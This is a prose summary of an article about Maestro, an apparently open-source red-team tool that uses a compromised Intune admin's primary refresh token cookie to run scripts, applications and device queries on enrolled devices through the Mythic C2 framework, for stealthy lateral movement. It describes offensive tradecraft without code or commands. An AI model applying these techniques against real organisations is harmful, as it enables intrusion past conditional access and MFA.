Maestro

The article discusses the challenges of using Intune for lateral movement over command and control (C2) agents. The author explains that even with an Intune admin's workstation compromised, executing scripts or applications on Intune-enrolled devices is not straightforward due to conditional access policies (CAPs) and multi-factor authentication (MFA) requirements. The author highlights the need to maintain stealth and avoid using suspicious tools or generating suspicious activity logs. To overcome these hurdles, the author introduces Maestro, an open-source tool that automates the process of using an Intune admin's privileges to execute actions on Intune-enrolled devices. Maestro uses a primary refresh token (PRT) cookie to interact with Azure and execute scripts, applications, and device queries on Intune devices. The tool takes care of acquiring necessary tokens and making HTTP requests to execute the desired action. Maestro can be used to execute the "Death from Above" attack path, which involves gaining access to a code repository by moving laterally to a user's workstation. The author provides a walkthrough of using Maestro with the Mythic C2 framework to execute scripts, applications, and device queries on Intune devices. Maestro can also be used to resolve user IDs to principal names and query devices in real-time. The tool's features and usage are demonstrated through various examples, including executing PowerShell scripts and applications on Intune devices.